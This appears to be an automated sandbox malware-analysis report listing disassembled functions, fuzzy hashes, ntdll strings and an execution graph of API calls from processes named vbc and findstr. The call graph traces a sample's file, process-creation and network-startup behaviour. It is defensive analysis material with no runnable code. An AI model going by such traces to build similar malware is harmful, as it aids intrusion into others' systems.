                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75b9a7fac0430d94d2ed2faf17d9a000ef7cff2212baedfa6bb96a38d692ba1b
                            • Instruction ID: 9ebc9f86f2e0efc485cd02291a9262e0333314a977b0ed67f9f9b72a5762f3fb
                            • Opcode Fuzzy Hash: 75b9a7fac0430d94d2ed2faf17d9a000ef7cff2212baedfa6bb96a38d692ba1b
                            • Instruction Fuzzy Hash: 2E90027220140812E1807168494468A001987D1701FD5C015E0027654DCB598B597BA1
                            Function 051A2BE0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 199003538ffd25a2f6c6402960491a7af164c9a9451fad4ffadf8d5694a694ab
                            • Instruction ID: 57db2037b68667b3aaf9e8449bff30e395dcb90e861d650af193d4e565155ded
                            • Opcode Fuzzy Hash: 199003538ffd25a2f6c6402960491a7af164c9a9451fad4ffadf8d5694a694ab
                            • Instruction Fuzzy Hash: 3E90027220544852E14071684944A86002987D0705F95C011E0066694D97698E55BA61
                            Function 051A2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 833f94ed2491edc42c672934d54efe434d8f39e21f1e0c1231bdc90a674d8066
                            • Instruction ID: f2f93273dde0a2383492baa13500e2a027c5e38ad526b3b5e4df4c34fdc7e910
                            • Opcode Fuzzy Hash: 833f94ed2491edc42c672934d54efe434d8f39e21f1e0c1231bdc90a674d8066
                            • Instruction Fuzzy Hash: 629002E2201540A25500B2688944B4A451987E0601B95C016E1056560CC66989519535
                            Function 051A2AD0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a195f11a3fd2eaa1babaa415195565e83aa77fe648b68937df150dc3a05c9a68
                            • Instruction ID: d8f1d09d2ebcd5de4c55427b98b9f0855e26b86baec26e5448f90aa6ecae116a
                            • Opcode Fuzzy Hash: a195f11a3fd2eaa1babaa415195565e83aa77fe648b68937df150dc3a05c9a68
                            • Instruction Fuzzy Hash: 37900477311400131105F57C0F44547005FC7D57513D5C031F1017550CD775CD715531
                            Function 051A2AF0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 432853e9aa27b297daa11817d9c9aa4e935ad43db58d4589f8d418f3e93f3fa3
                            • Instruction ID: 62e209d4f92e39c30991d813da3f2af2b9b74a6508c4628e20b2953b7db4c9e4
                            • Opcode Fuzzy Hash: 432853e9aa27b297daa11817d9c9aa4e935ad43db58d4589f8d418f3e93f3fa3
                            • Instruction Fuzzy Hash: 4A900266221400121145B5680B4454B045997D67513D5C015F1417590CC76589655721
                            Function 051A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction ID: a83e5f6afbfc93bfd895f9ea5e66e1c88cd3afc0ca5b767a6776ea98f0e23c6a
                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction Fuzzy Hash:
                            Function 051A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: cd2af24a6715c067bf07c418207646be9c3eb181ec469eec4349179c0a70e522
                            • Instruction ID: daefe945f373fe319b0bab0e41115fdd32c11f7932fb8eae3e542dfb03746da0
                            • Opcode Fuzzy Hash: cd2af24a6715c067bf07c418207646be9c3eb181ec469eec4349179c0a70e522
                            • Instruction Fuzzy Hash: 935104BAA04116BFCB21DFA8899097EF7F9BF08640B508229E4B5D7641E374DE4087A0
                            Function 05197630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 051D4725
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 051D4655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051D46FC
                            • Execute=1, xrefs: 051D4713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 051D4742
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 051D4787
                            • ExecuteOptions, xrefs: 051D46A0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: be0eed92dc0fd9dcb4c6e8f2189fc252d8f361a6f934dc8db9e773136d757cdf
                            • Instruction ID: 19bf0d916350df47548ff81e436d222c90895a05bba7a9a60fadd02f0037c39c
                            • Opcode Fuzzy Hash: be0eed92dc0fd9dcb4c6e8f2189fc252d8f361a6f934dc8db9e773136d757cdf
                            • Instruction Fuzzy Hash: DE512935B502597AEF29EEA4DC8DFE977A9FF45300F040099E605A71C1EBB09A41CF50
                            Function 051AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 741b87e9ada628eb9b38c7a8ad04a8737f1e777a7f6a157157131ce98df230a1
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: BF81A27AE0D2C99ADF2BDEA8C451BFEBBB2BF85310F184119D895A72D1C7749440CB50
                            Function 0519BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Resource at %p, xrefs: 051D7B8E
                            • RTL: Re-Waiting, xrefs: 051D7BAC
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 051D7B7F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 741e594de82f5e9e97c4271ab5a761d0cbd5044583f0a9a835729bc6ac7bbeb9
                            • Instruction ID: c37d2f56e2c3b86cf3239bd01f89b1db0ce9473c0c25083b0839aa93b6df6a48
                            • Opcode Fuzzy Hash: 741e594de82f5e9e97c4271ab5a761d0cbd5044583f0a9a835729bc6ac7bbeb9
                            • Instruction Fuzzy Hash: 8541E3353087029FCB28DE25D840F6AB7E6FF88710F100A1DE95A9B681DB71E805CB91
                            Function 0519B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 051D728C
                            Strings
                            • RTL: Resource at %p, xrefs: 051D72A3
                            • RTL: Re-Waiting, xrefs: 051D72C1
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 051D7294
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 2a8a8cc78e93571686e5bcd842164f7f5375095292e66dc899123b8d2a3d4a7f
                            • Instruction ID: 72562709d9b754d3f8e32ad997749b3ae75cee188e534c510f90f634305d03de
                            • Opcode Fuzzy Hash: 2a8a8cc78e93571686e5bcd842164f7f5375095292e66dc899123b8d2a3d4a7f
                            • Instruction Fuzzy Hash: 37410371708642ABDB25DE25CC41F6AB7A5FF84710F140619FD56AB280DB30F802DBE0
                            Function 051A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: 98512e96f7629fa5177dd2a4c9b0201c1d64e519fb6d7bbf0c38c2443e0d6c9c
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: 0291B47AF042069FDF2ADF69C890ABEB7A6FF44720F14451AE865E72C1D7348B818750
                            Function 05169126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 55443b00fb114164e2780f52d5275d21c9bbbe7c3f39aa4cf9ffdbd109b263b4
                            • Instruction ID: 74cb6abcf102742990a032a36fd1db94f9e2563887f815236ba8245416d5ecc4
                            • Opcode Fuzzy Hash: 55443b00fb114164e2780f52d5275d21c9bbbe7c3f39aa4cf9ffdbd109b263b4
                            • Instruction Fuzzy Hash: E0812D76D002699BDB35DB54CC45BEEBBB5AF08710F1041DAE919B7280E7715E84CFA0
                            Function 051ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                            Download Yara Rule
                            APIs
                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 051ECFBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: CallFilterFunc@8
                            • String ID: @$@4_w@4_w
                            • API String ID: 4062629308-713214301
                            • Opcode ID: 605cc4a74e228fba53fce26b0c1acc022d560aa35df9012fd38ae5814f93c45b
                            • Instruction ID: 7da35f8dc8eda5a0d4ecb0a91df7856a11c4dc866c9b250d6484b82a7decadad
                            • Opcode Fuzzy Hash: 605cc4a74e228fba53fce26b0c1acc022d560aa35df9012fd38ae5814f93c45b
                            • Instruction Fuzzy Hash: 3B41DF71A00618DFCB22DFA8D844AAEFBB8FF44B10F54442EE915DB291D734D941CBA1

                            Execution Graph

                            Execution Coverage:2.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:1.7%
                            Total number of Nodes:414
                            Total number of Limit Nodes:66
                            execution_graph 83349 6d316c 83354 6d7880 83349->83354 83352 6d3191 83355 6d789a 83354->83355 83359 6d317c 83354->83359 83363 6e77b0 83355->83363 83358 6e8090 NtClose 83358->83359 83359->83352 83360 6e8090 83359->83360 83361 6e80ad 83360->83361 83362 6e80be NtClose 83361->83362 83362->83352 83364 6e77ca 83363->83364 83367 2f835c0 LdrInitializeThunk 83364->83367 83365 6d796a 83365->83358 83367->83365 83368 6c9829 83369 6c97e2 83368->83369 83370 6c981d 83369->83370 83371 6c980a CreateThread 83369->83371 83372 6defe0 83373 6df044 83372->83373 83397 6d6050 83373->83397 83375 6df174 83376 6df16d 83376->83375 83404 6d6160 83376->83404 83378 6df313 83379 6df1f0 83379->83378 83380 6df322 83379->83380 83408 6dedc0 83379->83408 83381 6e8090 NtClose 83380->83381 83383 6df32c 83381->83383 83384 6df225 83384->83380 83385 6df230 83384->83385 83417 6ea040 83385->83417 83387 6df259 83388 6df278 83387->83388 83389 6df262 83387->83389 83420 6decb0 CoInitialize 83388->83420 83390 6e8090 NtClose 83389->83390 83392 6df26c 83390->83392 83393 6e8090 NtClose 83394 6df30c 83393->83394 83422 6e9f60 83394->83422 83396 6df286 83396->83393 83398 6d6083 83397->83398 83399 6d60a7 83398->83399 83425 6e7c20 83398->83425 83399->83376 83401 6d60ca 83401->83399 83402 6e8090 NtClose 83401->83402 83403 6d614a 83402->83403 83403->83376 83405 6d6185 83404->83405 83430 6e7a10 83405->83430 83409 6deddc 83408->83409 83435 6d4530 83409->83435 83411 6dee00 83411->83384 83412 6dedf7 83412->83411 83413 6d4530 2 API calls 83412->83413 83414 6deecb 83413->83414 83415 6d4530 2 API calls 83414->83415 83416 6def28 83414->83416 83415->83416 83416->83384 83443 6e83b0 83417->83443 83419 6ea05b 83419->83387 83421 6ded15 83420->83421 83421->83396 83446 6e8400 83422->83446 83424 6e9f79 83424->83378 83426 6e7c3a 83425->83426 83429 2f82ca0 LdrInitializeThunk 83426->83429 83427 6e7c66 83427->83401 83429->83427 83431 6e7a2d 83430->83431 83434 2f82c60 LdrInitializeThunk 83431->83434 83432 6d61f9 83432->83379 83434->83432 83437 6d4554 83435->83437 83436 6d455b 83436->83412 83437->83436 83439 6d457a 83437->83439 83442 6eb420 LdrLoadDll 83437->83442 83440 6d45a7 83439->83440 83441 6d4590 LdrLoadDll 83439->83441 83440->83412 83441->83440 83442->83439 83444 6e83cd 83443->83444 83445 6e83de RtlAllocateHeap 83444->83445 83445->83419 83447 6e841d 83446->83447 83448 6e842e RtlFreeHeap 83447->83448 83448->83424 83449 6d57e0 83454 6d7c00 83449->83454 83451 6d5810 83453 6d583c 83451->83453 83458 6d7b80 83451->83458 83455 6d7c13 83454->83455 83465 6e7620 83455->83465 83457 6d7c3e 83457->83451 83459 6d7bc4 83458->83459 83460 6d7be5 83459->83460 83471 6e7420 83459->83471 83460->83451 83462 6d7bd5 83463 6d7bf1 83462->83463 83464 6e8090 NtClose 83462->83464 83463->83451 83464->83460 83466 6e7690 83465->83466 83468 6e7641 83465->83468 83470 2f82dd0 LdrInitializeThunk 83466->83470 83467 6e76b5 83467->83457 83468->83457 83470->83467 83472 6e748f 83471->83472 83474 6e7441 83471->83474 83476 2f84650 LdrInitializeThunk 83472->83476 83473 6e74b4 83473->83462 83474->83462 83476->83473 83477 6e7560 83478 6e75e1 83477->83478 83480 6e7581 83477->83480 83482 2f82ee0 LdrInitializeThunk 83478->83482 83479 6e7612 83482->83479 83485 6c9830 83487 6c9bd8 83485->83487 83486 6ca0b3 83487->83486 83489 6e9bf0 83487->83489 83490 6e9c16 83489->83490 83495 6c4110 83490->83495 83492 6e9c22 83493 6e9c50 83492->83493 83499 6e46c0 83492->83499 83493->83486 83496 6c4111 83495->83496 83503 6d3260 83496->83503 83498 6c411d 83498->83492 83500 6e471a 83499->83500 83501 6e4727 83500->83501 83524 6d1740 83500->83524 83501->83493 83504 6d3277 83503->83504 83506 6d32a4 83504->83506 83508 6d3290 83504->83508 83516 6e7000 RtlFreeHeap LdrInitializeThunk 83504->83516 83509 6e8ae0 83506->83509 83508->83498 83511 6e8af8 83509->83511 83510 6e8b1c 83510->83508 83511->83510 83517 6e7710 83511->83517 83514 6e9f60 RtlFreeHeap 83515 6e8b8a 83514->83515 83515->83508 83516->83506 83518 6e772d 83517->83518 83521 2f82c0a 83518->83521 83519 6e7759 83519->83514 83522 2f82c1f LdrInitializeThunk 83521->83522 83523 2f82c11 83521->83523 83522->83519 83523->83519 83525 6d177b 83524->83525 83542 6d7990 83525->83542 83527 6d1783 83528 6d1a4c 83527->83528 83529 6ea040 RtlAllocateHeap 83527->83529 83528->83501 83530 6d1799 83529->83530 83531 6ea040 RtlAllocateHeap 83530->83531 83532 6d17aa 83531->83532 83533 6ea040 RtlAllocateHeap 83532->83533 83535 6d17bb 83533->83535 83537 6d184e 83535->83537 83557 6d67b0 NtClose LdrInitializeThunk LdrInitializeThunk 83535->83557 83536 6d4530 2 API calls 83538 6d1a0c 83536->83538 83537->83536 83539 6d1a38 WSAStartup 83538->83539 83540 6d1a46 83538->83540 83539->83540 83553 6e6de0 83540->83553 83543 6d79bc 83542->83543 83544 6d7880 2 API calls 83543->83544 83545 6d79df 83544->83545 83546 6d79e9 83545->83546 83547 6d7a01 83545->83547 83548 6d79f4 83546->83548 83550 6e8090 NtClose 83546->83550 83549 6d7a1d 83547->83549 83551 6e8090 NtClose 83547->83551 83548->83527 83549->83527 83550->83548 83552 6d7a13 83551->83552 83552->83527 83554 6e6e3a 83553->83554 83556 6e6e47 83554->83556 83558 6d1a60 83554->83558 83556->83528 83557->83537 83575 6d7c60 83558->83575 83560 6d1f55 83560->83556 83562 6d1c81 83584 6eb170 83562->83584 83564 6d1a80 83564->83560 83579 6eb040 83564->83579 83565 6d7c00 LdrInitializeThunk 83570 6d1cbe 83565->83570 83566 6d1c96 83568 6d1de2 83566->83568 83566->83570 83590 6e4740 83566->83590 83594 6d0710 83568->83594 83570->83560 83570->83565 83571 6e4740 LdrInitializeThunk 83570->83571 83572 6d0710 LdrInitializeThunk 83570->83572 83571->83570 83572->83570 83573 6d1dec 83573->83570 83574 6d7c00 LdrInitializeThunk 83573->83574 83574->83573 83576 6d7c6d 83575->83576 83577 6d7c8c SetErrorMode 83576->83577 83578 6d7c93 83576->83578 83577->83578 83578->83564 83580 6eb056 83579->83580 83581 6eb050 83579->83581 83582 6ea040 RtlAllocateHeap 83580->83582 83581->83562 83583 6eb07c 83582->83583 83583->83562 83585 6eb0e0 83584->83585 83586 6eb13d 83585->83586 83587 6ea040 RtlAllocateHeap 83585->83587 83586->83566 83588 6eb11a 83587->83588 83589 6e9f60 RtlFreeHeap 83588->83589 83589->83586 83591 6e479a 83590->83591 83593 6e47bb 83591->83593 83597 6d58d0 83591->83597 83593->83566 83602 6e8310 83594->83602 83598 6d588f 83597->83598 83599 6d5901 83598->83599 83600 6e7710 LdrInitializeThunk 83598->83600 83599->83593 83601 6d58a6 83600->83601 83601->83593 83603 6e832a 83602->83603 83606 2f82c70 LdrInitializeThunk 83603->83606 83604 6d0732 83604->83573 83606->83604 83607 6d7e70 GetFileAttributesW 83608 6d7e81 83607->83608 83609 6e0eb0 83610 6e0ecc 83609->83610 83611 6e0f08 83610->83611 83612 6e0ef4 83610->83612 83614 6e8090 NtClose 83611->83614 83613 6e8090 NtClose 83612->83613 83615 6e0efd 83613->83615 83616 6e0f11 83614->83616 83619 6ea080 RtlAllocateHeap 83616->83619 83618 6e0f1c 83619->83618 83620 6d82ce 83621 6d82d3 83620->83621 83622 6d8292 83621->83622 83624 6d6d10 LdrInitializeThunk LdrInitializeThunk 83621->83624 83624->83622 83625 6d27ce 83626 6d2805 83625->83626 83627 6d6050 2 API calls 83626->83627 83628 6d2810 83627->83628 83629 2f82ad0 LdrInitializeThunk 83630 6df8c0 83631 6df8dd 83630->83631 83632 6d4530 2 API calls 83631->83632 83633 6df8f8 83632->83633 83634 6d6b00 83635 6d6b2a 83634->83635 83638 6d7a30 83635->83638 83637 6d6b51 83639 6d7a4d 83638->83639 83645 6e7800 83639->83645 83641 6d7a9d 83642 6d7aa4 83641->83642 83650 6e78d0 83641->83650 83642->83637 83644 6d7acd 83644->83637 83646 6e7890 83645->83646 83648 6e7824 83645->83648 83655 2f82f30 LdrInitializeThunk 83646->83655 83647 6e78c9 83647->83641 83648->83641 83651 6e7972 83650->83651 83653 6e78f4 83650->83653 83656 2f82d10 LdrInitializeThunk 83651->83656 83652 6e79b7 83652->83644 83653->83644 83655->83647 83656->83652 83657 6e1240 83658 6e124f 83657->83658 83659 6e1296 83658->83659 83662 6e12d7 83658->83662 83664 6e12dc 83658->83664 83660 6e9f60 RtlFreeHeap 83659->83660 83661 6e12a6 83660->83661 83663 6e9f60 RtlFreeHeap 83662->83663 83663->83664 83665 6e8000 83666 6e8069 83665->83666 83668 6e8021 83665->83668 83667 6e807f NtDeleteFile 83666->83667 83669 6e76c0 83670 6e76da 83669->83670 83673 2f82df0 LdrInitializeThunk 83670->83673 83671 6e7702 83673->83671 83674 6e7dc0 83675 6e7e6c 83674->83675 83677 6e7de8 83674->83677 83676 6e7e82 NtCreateFile 83675->83676 83688 6e5080 83689 6e50da 83688->83689 83691 6e50e7 83689->83691 83692 6e2c20 83689->83692 83693 6e2c5e 83692->83693 83694 6d4530 2 API calls 83693->83694 83696 6e2d57 83693->83696 83697 6e2c9e 83694->83697 83695 6e2cd1 Sleep 83695->83697 83696->83691 83697->83695 83697->83696 83698 6e0a41 83710 6e7f20 83698->83710 83700 6e0a62 83701 6e0a95 83700->83701 83702 6e0a80 83700->83702 83704 6e8090 NtClose 83701->83704 83703 6e8090 NtClose 83702->83703 83705 6e0a89 83703->83705 83707 6e0a9e 83704->83707 83706 6e0aca 83707->83706 83708 6e9f60 RtlFreeHeap 83707->83708 83709 6e0abe 83708->83709 83711 6e7fb9 83710->83711 83713 6e7f41 83710->83713 83712 6e7fcf NtReadFile 83711->83712 83712->83700 83713->83700 83714 6d7082 83715 6d704b 83714->83715 83719 6d708c 83714->83719 83718 6d7055 83715->83718 83748 6d64b0 NtClose LdrInitializeThunk LdrInitializeThunk 83715->83748 83717 6d70fc 83719->83717 83721 6dac80 83719->83721 83722 6daca6 83721->83722 83723 6daebc 83722->83723 83749 6e8490 83722->83749 83723->83717 83725 6dad19 83725->83723 83726 6eb170 2 API calls 83725->83726 83727 6dad35 83726->83727 83727->83723 83728 6dae00 83727->83728 83729 6e7710 LdrInitializeThunk 83727->83729 83730 6d5760 LdrInitializeThunk 83728->83730 83732 6dae1f 83728->83732 83731 6dad8e 83729->83731 83730->83732 83731->83728 83735 6dad97 83731->83735 83736 6daea4 83732->83736 83755 6e72e0 83732->83755 83733 6dade8 83737 6d7c00 LdrInitializeThunk 83733->83737 83734 6dadc6 83770 6e38c0 LdrInitializeThunk 83734->83770 83735->83723 83735->83733 83735->83734 83752 6d5760 83735->83752 83738 6d7c00 LdrInitializeThunk 83736->83738 83742 6dadf6 83737->83742 83743 6daeb2 83738->83743 83742->83717 83743->83717 83744 6dae7b 83760 6e7380 83744->83760 83746 6dae95 83765 6e74c0 83746->83765 83748->83718 83750 6e84aa 83749->83750 83751 6e84bb CreateProcessInternalW 83750->83751 83751->83725 83753 6e78d0 LdrInitializeThunk 83752->83753 83754 6d579e 83753->83754 83754->83734 83756 6e734f 83755->83756 83758 6e7301 83755->83758 83771 2f839b0 LdrInitializeThunk 83756->83771 83757 6e7374 83757->83744 83758->83744 83761 6e73ef 83760->83761 83762 6e73a1 83760->83762 83772 2f84340 LdrInitializeThunk 83761->83772 83762->83746 83763 6e7414 83763->83746 83766 6e752f 83765->83766 83768 6e74e1 83765->83768 83773 2f82fb0 LdrInitializeThunk 83766->83773 83767 6e7554 83767->83736 83768->83736 83770->83733 83771->83757 83772->83763 83773->83767 83774 6d96d0 83775 6d96d7 83774->83775 83775->83774 83776 6d96f8 83775->83776 83777 6e9f60 RtlFreeHeap 83775->83777 83777->83776 83778 6dbf10 83780 6dbf39 83778->83780 83779 6dc03c 83780->83779 83781 6dbfe0 FindFirstFileW 83780->83781 83781->83779 83783 6dbffb 83781->83783 83782 6dc023 FindNextFileW 83782->83783 83784 6dc035 FindClose 83782->83784 83783->83782 83784->83779 83785 6d0b90 83786 6d0b97 83785->83786 83787 6d4530 2 API calls 83786->83787 83788 6d0bc5 83787->83788 83789 6d0bf9 PostThreadMessageW 83788->83789 83790 6d0c0a 83788->83790 83789->83790 83791 6da790 83796 6da4c0 83791->83796 83793 6da79d 83808 6da160 83793->83808 83795 6da7b9 83797 6da4e5 83796->83797 83798 6da622 83797->83798 83818 6e2510 83797->83818 83798->83793 83800 6da639 83800->83793 83801 6da630 83801->83800 83803 6da721 83801->83803 83829 6d9bc0 83801->83829 83805 6da779 83803->83805 83838 6d9f20 83803->83838 83806 6e9f60 RtlFreeHeap 83805->83806 83807 6da780 83806->83807 83807->83793 83809 6da176 83808->83809 83815 6da181 83808->83815 83810 6ea040 RtlAllocateHeap 83809->83810 83810->83815 83811 6da197 83811->83795 83812 6da48e 83813 6da4a7 83812->83813 83814 6e9f60 RtlFreeHeap 83812->83814 83813->83795 83814->83813 83815->83811 83815->83812 83816 6d9bc0 RtlFreeHeap 83815->83816 83817 6d9f20 RtlFreeHeap 83815->83817 83816->83815 83817->83815 83819 6e251e 83818->83819 83820 6e2525 83818->83820 83819->83801 83821 6d4530 2 API calls 83820->83821 83822 6e2557 83821->83822 83823 6e2566 83822->83823 83842 6e1fe0 LdrLoadDll LdrLoadDll 83822->83842 83825 6ea040 RtlAllocateHeap 83823->83825 83828 6e2701 83823->83828 83827 6e257f 83825->83827 83826 6e9f60 RtlFreeHeap 83826->83828 83827->83826 83827->83828 83828->83801 83830 6d9be6 83829->83830 83843 6dd3e0 83830->83843 83832 6d9c4d 83834 6d9dd0 83832->83834 83835 6d9c6b 83832->83835 83833 6d9db5 83833->83801 83834->83833 83836 6d9a80 RtlFreeHeap 83834->83836 83835->83833 83848 6d9a80 83835->83848 83836->83834 83839 6d9f46 83838->83839 83840 6dd3e0 RtlFreeHeap 83839->83840 83841 6d9fc2 83840->83841 83841->83803 83842->83823 83845 6dd3f6 83843->83845 83844 6dd403 83844->83832 83845->83844 83846 6e9f60 RtlFreeHeap 83845->83846 83847 6dd43c 83846->83847 83847->83832 83849 6d9a96 83848->83849 83852 6dd450 83849->83852 83851 6d9b9c 83851->83835 83853 6dd45d 83852->83853 83854 6dd50c 83853->83854 83855 6e9f60 RtlFreeHeap 83853->83855 83854->83851 83855->83854

                            Executed Functions

                            Function 006DBF10 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 006DBFF1
                            • FindNextFileW.KERNELBASE(?,00000010), ref: 006DC02E
                            • FindClose.KERNELBASE(?), ref: 006DC039
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
